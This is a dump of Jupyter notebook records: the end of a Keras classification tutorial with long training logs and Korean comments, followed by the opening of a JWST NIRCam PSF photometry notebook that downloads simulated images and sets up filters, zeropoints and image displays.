0.8000\nEpoch 841/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4616 - accuracy: 0.7800\nEpoch 842/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4689 - accuracy: 0.7400\nEpoch 843/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4659 - accuracy: 0.7600\nEpoch 844/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4675 - accuracy: 0.7200\nEpoch 845/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4739 - accuracy: 0.7800\nEpoch 846/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4653 - accuracy: 0.8000\nEpoch 847/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4541 - accuracy: 0.7600\nEpoch 848/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4773 - accuracy: 0.7400\nEpoch 849/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4595 - accuracy: 0.8200\nEpoch 850/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4671 - accuracy: 0.7400\nEpoch 851/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4474 - accuracy: 0.7600\nEpoch 852/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4583 - accuracy: 0.7800\nEpoch 853/1000\n10/10 
[==============================] - 0s 9ms/step - loss: 0.4530 - accuracy: 0.7400\nEpoch 854/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4589 - accuracy: 0.7800\nEpoch 855/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4688 - accuracy: 0.7600\nEpoch 856/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4808 - accuracy: 0.7400\nEpoch 857/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4800 - accuracy: 0.7800\nEpoch 858/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4711 - accuracy: 0.7800\nEpoch 859/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7400\nEpoch 860/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4728 - accuracy: 0.7200\nEpoch 861/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4768 - accuracy: 0.7400\nEpoch 862/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4641 - accuracy: 0.8000\nEpoch 863/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5019 - accuracy: 0.7600\nEpoch 864/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4894 - accuracy: 0.7800\nEpoch 865/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4756 - accuracy: 0.8200\nEpoch 866/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4602 - accuracy: 0.7600\nEpoch 867/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4567 - accuracy: 0.7600\nEpoch 868/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4572 - accuracy: 0.7600\nEpoch 869/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4621 - accuracy: 0.8000\nEpoch 870/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4578 - accuracy: 0.7600\nEpoch 871/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7400\nEpoch 872/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4499 - accuracy: 0.7800\nEpoch 873/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4507 - accuracy: 0.7800\nEpoch 874/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4592 - accuracy: 0.7600\nEpoch 875/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4648 - accuracy: 0.8000\nEpoch 876/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4695 - accuracy: 0.7400\nEpoch 877/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5178 - accuracy: 0.7600\nEpoch 878/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5050 - accuracy: 0.7200\nEpoch 879/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4794 - accuracy: 0.7600\nEpoch 880/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4726 - accuracy: 0.8000\nEpoch 881/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4774 - accuracy: 0.7800\nEpoch 882/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4562 - accuracy: 0.7800\nEpoch 883/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4567 - accuracy: 0.7800\nEpoch 884/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4391 - accuracy: 0.7600\nEpoch 885/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4678 - accuracy: 0.7800\nEpoch 886/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4679 - accuracy: 0.7400\nEpoch 887/1000\n10/10 
[==============================] - 0s 6ms/step - loss: 0.4519 - accuracy: 0.7800\nEpoch 888/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4478 - accuracy: 0.7800\nEpoch 889/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4607 - accuracy: 0.7000\nEpoch 890/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4485 - accuracy: 0.7600\nEpoch 891/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4547 - accuracy: 0.7400\nEpoch 892/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4472 - accuracy: 0.7400\nEpoch 893/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4680 - accuracy: 0.7600\nEpoch 894/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4552 - accuracy: 0.7600\nEpoch 895/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4493 - accuracy: 0.7800\nEpoch 896/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4587 - accuracy: 0.7400\nEpoch 897/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4812 - accuracy: 0.8000\nEpoch 898/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4679 - accuracy: 0.8000\nEpoch 899/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5023 - accuracy: 0.7200\nEpoch 900/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4484 - accuracy: 0.7800\nEpoch 901/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4642 - accuracy: 0.7000\nEpoch 902/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4488 - accuracy: 0.7800\nEpoch 903/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4536 - accuracy: 0.7400\nEpoch 904/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4574 - accuracy: 0.7600\nEpoch 905/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4738 - accuracy: 0.7600\nEpoch 906/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4710 - accuracy: 0.7800\nEpoch 907/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4526 - accuracy: 0.8000\nEpoch 908/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4406 - accuracy: 0.7800\nEpoch 909/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4700 - accuracy: 0.7400\nEpoch 910/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4764 - accuracy: 0.7800\nEpoch 911/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4510 - accuracy: 0.7400\nEpoch 912/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4582 - accuracy: 0.7400\nEpoch 913/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4502 - accuracy: 0.7600\nEpoch 914/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4436 - accuracy: 0.7800\nEpoch 915/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4531 - accuracy: 0.7400\nEpoch 916/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4872 - accuracy: 0.8000\nEpoch 917/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5109 - accuracy: 0.7000\nEpoch 918/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5050 - accuracy: 0.7400\nEpoch 919/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4858 - accuracy: 0.7400\nEpoch 920/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5437 - accuracy: 0.7000\nEpoch 921/1000\n10/10 
[==============================] - 0s 8ms/step - loss: 0.4848 - accuracy: 0.7400\nEpoch 922/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4535 - accuracy: 0.7800\nEpoch 923/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4512 - accuracy: 0.7600\nEpoch 924/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4620 - accuracy: 0.7400\nEpoch 925/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4567 - accuracy: 0.7800\nEpoch 926/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4543 - accuracy: 0.8000\nEpoch 927/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4434 - accuracy: 0.7600\nEpoch 928/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4484 - accuracy: 0.7600\nEpoch 929/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4611 - accuracy: 0.7800\nEpoch 930/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4379 - accuracy: 0.7600\nEpoch 931/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4567 - accuracy: 0.8000\nEpoch 932/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4553 - accuracy: 0.7800\nEpoch 933/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4540 - accuracy: 0.7600\nEpoch 934/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4600 - accuracy: 0.7800\nEpoch 935/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4663 - accuracy: 0.7800\nEpoch 936/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4429 - accuracy: 0.8200\nEpoch 937/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4442 - accuracy: 0.8000\nEpoch 938/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4577 - accuracy: 0.7800\nEpoch 939/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4901 - accuracy: 0.7600\nEpoch 940/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4609 - accuracy: 0.8200\nEpoch 941/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4677 - accuracy: 0.8000\nEpoch 942/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4428 - accuracy: 0.7600\nEpoch 943/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4495 - accuracy: 0.7800\nEpoch 944/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4422 - accuracy: 0.8000\nEpoch 945/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4344 - accuracy: 0.8200\nEpoch 946/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4403 - accuracy: 0.7600\nEpoch 947/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4391 - accuracy: 0.7400\nEpoch 948/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4467 - accuracy: 0.7800\nEpoch 949/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4359 - accuracy: 0.8200\nEpoch 950/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4433 - accuracy: 0.7400\nEpoch 951/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4379 - accuracy: 0.7400\nEpoch 952/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4413 - accuracy: 0.7800\nEpoch 953/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4399 - accuracy: 0.7600\nEpoch 954/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4420 - accuracy: 0.7800\nEpoch 955/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.4424 - accuracy: 0.7400\nEpoch 956/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4408 - accuracy: 0.7600\nEpoch 957/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 958/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4587 - accuracy: 0.7400\nEpoch 959/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4433 - accuracy: 0.7600\nEpoch 960/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4398 - accuracy: 0.8000\nEpoch 961/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4522 - accuracy: 0.7400\nEpoch 962/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4341 - accuracy: 0.7600\nEpoch 963/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4379 - accuracy: 0.7800\nEpoch 964/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4755 - accuracy: 0.8200\nEpoch 965/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4680 - accuracy: 0.7400\nEpoch 966/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 967/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4566 - accuracy: 0.7400\nEpoch 968/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4422 - accuracy: 0.8000\nEpoch 969/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4549 - accuracy: 0.8200\nEpoch 970/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4384 - accuracy: 0.7800\nEpoch 971/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4511 - accuracy: 0.7400\nEpoch 972/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4542 - accuracy: 0.7600\nEpoch 973/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4425 - accuracy: 0.8000\nEpoch 974/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4357 - accuracy: 0.7800\nEpoch 975/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4524 - accuracy: 0.7800\nEpoch 976/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4308 - accuracy: 0.7800\nEpoch 977/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4422 - accuracy: 0.7800\nEpoch 978/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4315 - accuracy: 0.7800\nEpoch 979/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4406 - accuracy: 0.8000\nEpoch 980/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4425 - accuracy: 0.7600\nEpoch 981/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4465 - accuracy: 0.7200\nEpoch 982/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4369 - accuracy: 0.7600\nEpoch 983/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4478 - accuracy: 0.7200\nEpoch 984/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4411 - accuracy: 0.8000\nEpoch 985/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4307 - accuracy: 0.7800\nEpoch 986/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4386 - accuracy: 0.8000\nEpoch 987/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4501 - accuracy: 0.7400\nEpoch 988/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4444 - accuracy: 0.7400\nEpoch 989/1000\n10/10 
[==============================] - 0s 8ms/step - loss: 0.4529 - accuracy: 0.8000\nEpoch 990/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4717 - accuracy: 0.7800\nEpoch 991/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4744 - accuracy: 0.7400\nEpoch 992/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4597 - accuracy: 0.7800\nEpoch 993/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4434 - accuracy: 0.7200\nEpoch 994/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4433 - accuracy: 0.7600\nEpoch 995/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4529 - accuracy: 0.8000\nEpoch 996/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4850 - accuracy: 0.7200\nEpoch 997/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4366 - accuracy: 0.7400\nEpoch 998/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4690 - accuracy: 0.7800\nEpoch 999/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4324 - accuracy: 0.8000\nEpoch 1000/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4388 - accuracy: 0.7800\n"
],
[
"model.evaluate(x_train, y_train)",
"2/2 [==============================] - 0s 8ms/step - loss: 0.4132 - accuracy: 0.8000\n"
],
[
"x_train[0:1]",
"_____no_output_____"
],
[
"model.predict(x_train[0:1]) # 의견이 나옴 ",
"_____no_output_____"
],
[
"# first = 0.61538462\n# second = 0.07692308\n# third = 0.53846154\n# pred = model.predict( [[ [first], [second], [third] ]] )\n\n# predict에 직접 값을 넣을 때 괄호 씌우기",
"_____no_output_____"
],
[
"pred = model.predict( x_train[0:1] )",
"_____no_output_____"
],
[
"np.argmax(pred)",
"_____no_output_____"
]
],
[
[
"\n\n---\n\n\n\n---\n\n\n",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7073865f652060e396a816f8e973e9c86ffd685 | 108,369 | ipynb | Jupyter Notebook | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | _notebooks/psf_photometry/NIRCam_PSF_Photometry_Example.ipynb | TheRealZoidberg/fastpagesTest | cc77425ff2734429473ff4cbe1dc7682f022a094 | [
"Apache-2.0"
] | null | null | null | 39.929624 | 954 | 0.570283 | [
[
[
"# NIRCam PSF Photometry Notebook\n\n\n**Data**: NIRCam simulated images obtained using [MIRAGE](https://jwst-docs.stsci.edu/jwst-other-tools/mirage-data-simulator) and run through the [JWST pipeline](https://jwst-pipeline.readthedocs.io/en/latest/) of the Large Magellanic Cloud (LMC) Astrometric Calibration Field. Simulations is obtained using a 4-pt subpixel dither for three couples of wide filters: F070W, F115W, and F200W for the SW channel, and F277W, F356W, and F444W for the LW channel. We simulated only 1 NIRCam SW detector (i.e., \"NRCB1\"). \n\nFor this example, we use Level-2 images (.cal, calibrated but not rectified) for two SW filters (i.e., F115W and F200W) and derive the photometry in each one of them. The images for the other filters are also available and can be used to test the notebook and/or different filters combination. \n\nThe notebook is divided in two parts: in Part I we show how to create a PSF model and perform the PSF photometry, whereas in Part II, we show how to derive the final calibrated Color-Magnitude Diagram.\n\nPSF Photometry can be obtained using:\n\n* single model obtained from WebbPSF\n* grid of PSF models from WebbPSF\n* single effective PSF (ePSF)\n\n### Work in Progress:\n\n* create a grid of ePSF and perform reduction using the ePSF grid\n* use the ePSF grid to perturbate the WebbPSF model\n\nThe notebook shows:\n\n* how to obtain the PSF model from WebbPSF (or build an ePSF)\n* how to perform PSF photometry on the image\n* how to cross-match the catalogs of the different images\n* how to derive and apply photometric zeropoint\n\nFinal plots show:\n\n* Instrumental Color-Magnitude Diagrams for the 4 images\n* Instrumental Color-Magnitude Diagrams and errors\n* Magnitudes Zeropoints \n* Calibrated Color-Magnitude Diagram (compared with Input Color-Magnitude Diagram)\n* Comparison between input and output photometry",
"_____no_output_____"
],
[
"**Note on pysynphot**: Data files for pysynphot are distributed separately by Calibration Reference Data System. They are expected to follow a certain directory structure under the root directory, identified by the PYSYN_CDBS environment variable that must be set prior to using this package. In the example below, the root directory is arbitrarily named /my/local/dir/trds/. \\\nexport PYSYN_CDBS=/my/local/dir/trds/ \\\nSee documentation [here](https://pysynphot.readthedocs.io/en/latest/#installation-and-setup) for the configuration and download of the data files.",
"_____no_output_____"
],
[
"## Import Functions",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\nimport time\n\nimport numpy as np\n\nimport pandas as pd\n\nimport glob as glob\n\nimport jwst\nfrom jwst.datamodels import ImageModel\n\nimport tarfile\n\nimport urllib.request\n\nfrom astropy import wcs\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.visualization import (ZScaleInterval, SqrtStretch, ImageNormalize)\nfrom astropy.visualization import simple_norm\nfrom astropy.nddata import Cutout2D, NDData\nfrom astropy.stats import gaussian_sigma_to_fwhm\nfrom astropy.table import Table, QTable\nfrom astropy.modeling.fitting import LevMarLSQFitter\nfrom astropy.wcs.utils import pixel_to_skycoord\nfrom astropy.coordinates import SkyCoord, match_coordinates_sky\nfrom astropy.stats import sigma_clipped_stats\n\nfrom photutils import CircularAperture, EPSFBuilder, find_peaks, CircularAnnulus\nfrom photutils.detection import DAOStarFinder, IRAFStarFinder\nfrom photutils.psf import DAOGroup, IntegratedGaussianPRF, extract_stars, IterativelySubtractedPSFPhotometry\nfrom photutils.background import MMMBackground, MADStdBackgroundRMS\nfrom photutils.centroids import centroid_2dg\nfrom photutils import aperture_photometry\n\nfrom ipywidgets import interact\n\nimport webbpsf\nfrom webbpsf.utils import to_griddedpsfmodel\n\nimport pysynphot # PYSIN_CDBS must be defined in the user's environment (see note above)",
"_____no_output_____"
]
],
[
[
"## Import Plotting Functions",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nfrom matplotlib import style, pyplot as plt\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\n\nplt.rcParams['image.cmap'] = 'viridis'\nplt.rcParams['image.origin'] = 'lower'\nplt.rcParams['axes.titlesize'] = plt.rcParams['axes.labelsize'] = 30\nplt.rcParams['xtick.labelsize'] = plt.rcParams['ytick.labelsize'] = 30\n\nfont1 = {'family': 'helvetica', 'color': 'black', 'weight': 'normal', 'size': '12'}\nfont2 = {'family': 'helvetica', 'color': 'black', 'weight': 'normal', 'size': '20'}",
"_____no_output_____"
]
],
[
[
"## Load the images and create some useful dictionaries\n\nWe load all the images and we create a dictionary that contains all of them, divided by detectors and filters. This is useful to check which detectors and filters are available and to decide if we want to perform the photometry on all of them or only on a subset (for example, only on the SW filters). \n\nWe also create a dictionary with some useful parameters for the analysis. The dictionary contains the photometric zeropoints (from [MIRAGE](https://jwst-docs.stsci.edu/jwst-other-tools/mirage-data-simulator) configuration files) and the NIRCam point spread function (PSF) FWHM, from the [NIRCam Point Spread Function](https://jwst-docs.stsci.edu/near-infrared-camera/nircam-predicted-performance/nircam-point-spread-functions) JDox page. The FWHM are calculated from the analysis of the expected NIRCam PSFs simulated with [WebbPSF](https://www.stsci.edu/jwst/science-planning/proposal-planning-toolbox/psf-simulation-tool). \n\n**Note**: this dictionary will be updated once the values for zeropoints and FWHM will be available for each detectors after commissioning. \n\nHence, we have two dictionaries:\n\n* dictionary for the single Level-2 calibrated images\n* dictionary with some other useful parameters\n",
"_____no_output_____"
]
],
[
[
"dict_images = {'NRCA1': {}, 'NRCA2': {}, 'NRCA3': {}, 'NRCA4': {}, 'NRCA5': {},\n 'NRCB1': {}, 'NRCB2': {}, 'NRCB3': {}, 'NRCB4': {}, 'NRCB5': {}}\n\ndict_filter_short = {}\ndict_filter_long = {}\n\nff_short = []\ndet_short = []\ndet_long = []\nff_long = []\ndetlist_short = []\ndetlist_long = []\nfiltlist_short = []\nfiltlist_long = []\n\nif not glob.glob('./*cal*fits'):\n\n print(\"Downloading images\")\n\n boxlink_images_lev2 = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/images_level2.tar.gz'\n boxfile_images_lev2 = './images_level2.tar.gz'\n urllib.request.urlretrieve(boxlink_images_lev2, boxfile_images_lev2)\n\n tar = tarfile.open(boxfile_images_lev2, 'r')\n tar.extractall()\n\n images_dir = './'\n images = sorted(glob.glob(os.path.join(images_dir, \"*cal.fits\")))\n\nelse:\n\n images_dir = './'\n images = sorted(glob.glob(os.path.join(images_dir, \"*cal.fits\")))\n\nfor image in images:\n\n im = fits.open(image)\n f = im[0].header['FILTER']\n d = im[0].header['DETECTOR']\n\n if d == 'NRCBLONG':\n d = 'NRCB5'\n elif d == 'NRCALONG':\n d = 'NRCA5'\n else:\n d = d\n\n wv = np.float(f[1:3])\n\n if wv > 24: \n ff_long.append(f)\n det_long.append(d)\n\n else:\n ff_short.append(f)\n det_short.append(d) \n\n detlist_short = sorted(list(dict.fromkeys(det_short)))\n detlist_long = sorted(list(dict.fromkeys(det_long)))\n\n unique_list_filters_short = []\n unique_list_filters_long = []\n\n for x in ff_short:\n\n if x not in unique_list_filters_short:\n\n dict_filter_short.setdefault(x, {})\n\n for x in ff_long:\n if x not in unique_list_filters_long:\n dict_filter_long.setdefault(x, {}) \n\n for d_s in detlist_short:\n dict_images[d_s] = dict_filter_short\n\n for d_l in detlist_long:\n dict_images[d_l] = dict_filter_long\n\n filtlist_short = sorted(list(dict.fromkeys(dict_filter_short)))\n filtlist_long = sorted(list(dict.fromkeys(dict_filter_long)))\n\n if len(dict_images[d][f]) == 0:\n dict_images[d][f] = {'images': [image]}\n else:\n dict_images[d][f]['images'].append(image)\n\nprint(\"Available Detectors for SW channel:\", detlist_short)\nprint(\"Available Detectors for LW channel:\", detlist_long)\nprint(\"Available SW Filters:\", filtlist_short)\nprint(\"Available LW Filters:\", filtlist_long)",
"_____no_output_____"
],
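[
"# Quick look (illustrative, not part of the original workflow): list the Level-2\n# images loaded for the detector/filter used in this example, to verify that the\n# dictionary was populated as expected\ndict_images['NRCB1']['F115W']['images']",
"_____no_output_____"
],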
[
"filters = ['F070W', 'F090W', 'F115W', 'F140M', 'F150W2', 'F150W', 'F162M', 'F164N', 'F182M',\n 'F187N', 'F200W', 'F210M', 'F212N', 'F250M', 'F277W', 'F300M', 'F322W2', 'F323N',\n 'F335M', 'F356W', 'F360M', 'F405N', 'F410M', 'F430M', 'F444W', 'F460M', 'F466N', 'F470N', 'F480M']\n\npsf_fwhm = [0.987, 1.103, 1.298, 1.553, 1.628, 1.770, 1.801, 1.494, 1.990, 2.060, 2.141, 2.304, 2.341, 1.340,\n 1.444, 1.585, 1.547, 1.711, 1.760, 1.830, 1.901, 2.165, 2.179, 2.300, 2.302, 2.459, 2.507, 2.535, 2.574]\n\nzp_modA = [25.7977, 25.9686, 25.8419, 24.8878, 27.0048, 25.6536, 24.6957, 22.3073, 24.8258, 22.1775, 25.3677, 24.3296,\n 22.1036, 22.7850, 23.5964, 24.8239, 23.6452, 25.3648, 20.8604, 23.5873, 24.3778, 23.4778, 20.5588,\n 23.2749, 22.3584, 23.9731, 21.9502, 20.0428, 19.8869, 21.9002]\n\nzp_modB = [25.7568, 25.9771, 25.8041, 24.8738, 26.9821, 25.6279, 24.6767, 22.2903, 24.8042, 22.1499, 25.3391, 24.2909,\n 22.0574, 22.7596, 23.5011, 24.6792, 23.5769, 25.3455, 20.8631, 23.4885, 24.3883, 23.4555, 20.7007,\n 23.2763, 22.4677, 24.1562, 22.0422, 20.1430, 20.0173, 22.4086]\n\ndict_utils = {filters[i]: {'psf fwhm': psf_fwhm[i], 'VegaMAG zp modA': zp_modA[i],\n 'VegaMAG zp modB': zp_modB[i]} for i in range(len(filters))}",
"_____no_output_____"
]
],
[
[
"## Select the detectors and/or filters for the analysis\n\nIf we are interested only in some filters (and/or some detectors) in the analysis, as in this example, we can select the Level-2 calibrated images from the dictionary for those filters (detectors) and analyze only those images.\n\nIn this particular example, we analyze images for filters **F115W** and **F200W** for the detector **NRCB1**.",
"_____no_output_____"
]
],
[
[
"dets_short = ['NRCB1'] # detector of interest in this example\nfilts_short = ['F115W', 'F200W'] # filters of interest in this example",
"_____no_output_____"
]
],
[
[
"## Display the images\n\nTo check that our images do not present artifacts and can be used in the analysis, we display them using an interactive cursor that allows to shuffle through the different images for each filter.\n\n### Note for developers: \n\nthis is only a sketch of what I would like to show (I am not very familiar with ipywidgets). Would it be possible to show both filters at the same time, in a 2 window panel as in the static plot below? Or even better, have a widget control that allows to select the filters available and then use interact to cycle through the images? ",
"_____no_output_____"
]
],
[
[
"# cell for display images using ipywidgets\n\ndef browse_images(images):\n n = len(images)\n\n def view_image(image):\n det = 'NRCB1'\n filt = 'F115W'\n im = fits.open(dict_images[det][filt]['images'][image])\n\n data_sb = im[1].data\n norm = simple_norm(data_sb, 'sqrt', percent=99.) \n plt.figure(figsize=(10, 10))\n\n plt.title(filt)\n plt.imshow(data_sb, norm=norm, cmap='Greys') \n plt.show()\n\n interact(view_image, image=(0, n - 1))",
"_____no_output_____"
],
[
"browse_images(dict_images['NRCB1']['F115W']['images'])",
"_____no_output_____"
]
],
[
[
"### Note for developers: \n\nCell below should be removed once we finalize the interactive one above.",
"_____no_output_____"
]
],
[
[
